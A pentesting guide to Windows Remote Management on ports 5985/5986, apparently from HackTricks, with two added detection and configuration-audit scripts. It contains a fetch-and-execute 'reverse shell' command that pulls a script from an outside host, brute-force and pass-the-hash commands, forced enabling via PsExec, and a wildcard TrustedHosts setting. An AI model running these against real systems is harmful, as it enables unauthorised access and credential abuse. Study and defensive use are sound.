5985,5986 - Pentesting WinRM


WinRM

Windows Remote Management (WinRM) is a Microsoft protocol that enables remote management of Windows systems over HTTP(S), using SOAP as the message format. Under the hood it is built on WMI, so it can be thought of as an HTTP-based interface for WMI operations.

The presence of WinRM on a machine allows straightforward remote administration through PowerShell, much as SSH does for other operating systems. To determine whether WinRM is running, check whether these ports are open:

  • 5985/tcp (HTTP)

  • 5986/tcp (HTTPS)

An open port from the list above indicates that WinRM has been set up, so an attempt to initiate a remote session can be made.

Initiating a WinRM Session

To configure PowerShell for WinRM, Microsoft's Enable-PSRemoting cmdlet is used; it sets the computer up to accept remote PowerShell commands. From an elevated PowerShell, the following commands enable this and mark any host as trusted:

Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *

This approach adds a wildcard to the trustedhosts configuration, a step that needs careful consideration because of its consequences: hosts in the TrustedHosts list are not authenticated, so the client will hand its credentials to whatever answers at that address. It has also been noted that changing the network type from "Public" to "Work" may be necessary on the attacker's machine.

Additionally, WinRM can be enabled remotely with the wmic command, as shown here:

wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"

This method allows WinRM to be configured remotely, improving the ability to manage Windows machines from afar.

Test if configured

To verify the setup from your attack machine, the Test-WSMan command is used to check whether the target has WinRM configured properly. When you run it you should receive details about the protocol version and wsmid, which indicates a successful configuration. Below are examples of the expected output for a configured target compared with an unconfigured one:

  • For a target that is properly configured, the output will look similar to this:

Test-WSMan <target-ip>

Execute a command

To execute ipconfig remotely on the target machine and see its output, run:

Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]

You can also execute a function from your current PS console via Invoke-Command. Suppose you have a function called enumeration defined locally and want to run it on the remote computer; you can do this:

Invoke-Command -ComputerName <computername> -ScriptBlock ${function:enumeration} [-ArgumentList "arguments"]

Execute a script

Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]

Get a reverse shell

Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}

Get a PS session

To get an interactive PowerShell shell use Enter-PSSession:

#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -AsPlainText -Force
## Note the ".\" in the username to indicate it's a local user (host domain)
$creds=New-Object System.Management.Automation.PSCredential(".\student41", $password)

# Enter
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
## Bypass proxy
Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
# Save session in var
$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)

The session will run in a new process (wsmprovhost) inside the "victim".
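Because every PS Remoting session on the target is hosted by wsmprovhost.exe, a process-creation feed (Security 4688 or Sysmon Event ID 1) gives a direct way to spot the Invoke-Command and Enter-PSSession activity shown above. The following is an added example, not part of the original page, that runs that detection over constructed JSON events; the computer name, users and paths are made up.

```python
import json

# Constructed Sysmon Event ID 1-style records (not real telemetry); the second one carries the
# download-cradle command line from the "Get a reverse shell" section above.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 1, "Computer": "dcorp-adminsrv", "User": "DCORP\\student41",
                "Image": "C:\\Windows\\System32\\wsmprovhost.exe",
                "ParentImage": "C:\\Windows\\System32\\svchost.exe",
                "CommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding"}),
    json.dumps({"EventID": 1, "Computer": "dcorp-adminsrv", "User": "DCORP\\student41",
                "Image": "C:\\Windows\\System32\\cmd.exe",
                "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe",
                "CommandLine": "cmd /c \"powershell -ep bypass iex (New-Object Net.WebClient)"
                               ".DownloadString('http://10.10.10.10:8080/ipst.ps1')\""}),
    json.dumps({"EventID": 1, "Computer": "dcorp-adminsrv", "User": "DCORP\\jarrieta",
                "Image": "C:\\Windows\\System32\\ipconfig.exe",
                "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe",
                "CommandLine": "ipconfig /all"}),
    json.dumps({"EventID": 1, "Computer": "dcorp-adminsrv", "User": "DCORP\\jarrieta",
                "Image": "C:\\Windows\\explorer.exe",
                "ParentImage": "C:\\Windows\\System32\\userinit.exe",
                "CommandLine": "explorer.exe"}),
]

# Command-line fragments that raise a child of wsmprovhost from "medium" to "high"
SUSPICIOUS = ("downloadstring", "-ep bypass", "-executionpolicy bypass", "iex ",
              "invoke-expression", "-enc ", "-encodedcommand")

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def detect_winrm_activity(lines) -> list:
    """Return (severity, computer, user, message) for each WinRM session host and its children."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("EventID") != 1:
            continue
        image, parent = basename(ev.get("Image", "")), basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if image == "wsmprovhost.exe":
            alerts.append(("info", ev["Computer"], ev["User"], "WinRM/PS Remoting session host started"))
        elif parent == "wsmprovhost.exe":
            sev = "high" if any(m in cmd.lower() for m in SUSPICIOUS) else "medium"
            alerts.append((sev, ev["Computer"], ev["User"], f"{image} spawned inside WinRM session: {cmd}"))
    return alerts

if __name__ == "__main__":
    for alert in detect_winrm_activity(SAMPLE_EVENTS):
        print(alert)
```

The "info" alert on its own is normal on hosts that are administered over WinRM; it is the children of wsmprovhost.exe, and what they were asked to run, that deserve triage.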

Force WinRM Open

To use PS Remoting and WinRM when the computer is not configured for it, you can enable it with:

.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"

Saving and Restoring sessions

This will not work if PowerShell on the remote computer is in Constrained Language mode.

#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -AsPlainText -Force
## Note the ".\" in the username to indicate it's a local user (host domain)
$creds=New-Object System.Management.Automation.PSCredential(".\student41", $password)

#You can save a session inside a variable
$sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
#And restore it at any moment doing
Enter-PSSession -Session $sess1

Inside these sessions you can load PS scripts using Invoke-Command:

Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1

Errors

If you get the following error:

enter-pssession : Connecting to remote server 10.10.10.175 failed with the following error message : The WinRM client cannot process the request. If the authentication scheme is different from Kerberos, or if the client computer is not joined to a domain, then HTTPS transport must be used or the destination machine must be added to the TrustedHosts configuration setting. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. You can get more information about that by running the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic.

Try this on the client (info from here):

winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
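Both TrustedHosts edits on this page (the wildcard set with Set-Item earlier and the explicit list set with winrm set here) are visible in the listing printed by winrm get winrm/config. The following is an added example, not part of the original page, that parses that indentation-based listing and flags the settings this page warns about; the sample listing is constructed to match the format, not captured from a real host.

```python
# Constructed sample in the format printed by `winrm get winrm/config`, trimmed to the
# keys this audit reads (a real listing has many more); not captured from a real host.
SAMPLE_CONFIG = """\
Config
    MaxEnvelopeSizekb = 500
    Client
        AllowUnencrypted = false
        Auth
            Basic = true
        TrustedHosts = *
    Service
        AllowUnencrypted = true
        Auth
            Basic = true
            Kerberos = true
"""

def parse_winrm_config(text: str) -> dict:
    """Turn the indented `winrm get` listing into nested dicts (sections) and strings (leaves)."""
    root = {}
    stack = [(-1, root)]                        # (indent, section dict) for each open section
    for line in text.splitlines():
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip(" "))
        while stack[-1][0] >= indent:           # close sections deeper than this line
            stack.pop()
        parent = stack[-1][1]
        key, sep, value = line.strip().partition(" = ")
        if sep:                                 # leaf: "Name = value"
            parent[key] = value.strip()
        else:                                   # section header, or a key with no value (empty TrustedHosts)
            parent[key] = {}
            stack.append((indent, parent[key]))
    return root

def audit_winrm_config(text: str) -> list:
    """Return one finding per weak setting: wildcard TrustedHosts, clear-text transport, Basic auth."""
    cfg = parse_winrm_config(text).get("Config", {})
    client, service = cfg.get("Client", {}), cfg.get("Service", {})
    findings = []
    trusted = client.get("TrustedHosts", {})
    if isinstance(trusted, str) and "*" in trusted:
        findings.append("Client/TrustedHosts contains '*': credentials go to whichever host answers, "
                        "and TrustedHosts entries are not authenticated")
    if service.get("AllowUnencrypted", "").lower() == "true":
        findings.append("Service/AllowUnencrypted=true: SOAP bodies may cross the wire in clear text on 5985")
    if service.get("Auth", {}).get("Basic", "").lower() == "true":
        findings.append("Service/Auth/Basic=true: base64 passwords, acceptable only behind HTTPS (5986)")
    return findings
```

An empty TrustedHosts prints as a bare `TrustedHosts` line with no value; the parser stores it as an empty section, which the audit treats as clean.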


WinRM connection from linux

Brute Force

Be careful: brute-forcing winrm could lock out users.

#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

#Just check a pair of credentials
# Username + Password + CMD command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm

Using evil-winrm

gem install evil-winrm

Read the documentation on its github: https://github.com/Hackplayers/evil-winrm

evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'  -i <IP>/<Domain>

Pass the hash with evil-winrm

To use evil-winrm to connect to an IPv6 address, create an entry in /etc/hosts that maps a domain name to the IPv6 address and connect to that domain.

evil-winrm -u <username> -H <Hash> -i <IP>

Using a PS-docker machine

docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds

Using a ruby script

Code extracted from here: https://alamot.github.io/winrm_shell/

require 'winrm-fs'

# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
# https://alamot.github.io/winrm_shell/

conn = WinRM::Connection.new(
  endpoint: 'https://IP:PORT/wsman',
  transport: :ssl,
  user: 'username',
  password: 'password',
  no_ssl_peer_verification: true
)

class String
  def tokenize
    self.
      split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
      select {|s| not s.empty? }.
      map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
  end
end

command=""
file_manager = WinRM::FS::FileManager.new(conn)

conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    command = gets
    if command.start_with?('UPLOAD') then
      upload_command = command.tokenize
      print("Uploading " + upload_command[1] + " to " + upload_command[2])
      file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
        puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
      end
      command = "echo `nOK`n"
    end
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print(stdout)
      STDERR.print(stderr)
    end
  end
  puts("Exiting with code #{output.exitcode}")
end

Shodan

  • port:5985 Microsoft-HTTPAPI


HackTricks Automatic Commands

Protocol_Name: WinRM    #Protocol Abbreviation if there is one.
Port_Number:  5985     #Comma separated if there is more than one.
Protocol_Description: Windows Remote Management        #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for WinRM
  Note: |
    Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.

    sudo gem install winrm winrm-fs colorize stringio
    git clone https://github.com/Hackplayers/evil-winrm.git
    cd evil-winrm
    ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!'

    https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/

    ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
    ^^so you can upload binaries from that directory        or -s to upload scripts (sherlock)
    menu
    invoke-binary `tab`

    #python3
    import winrm
    s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
    print(s.run_cmd('ipconfig'))
    print(s.run_ps('ipconfig'))

    https://book.hacktricks.xyz/pentesting/pentesting-winrm

Entry_2:
  Name: Hydra Brute Force
  Description: Need User
  Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
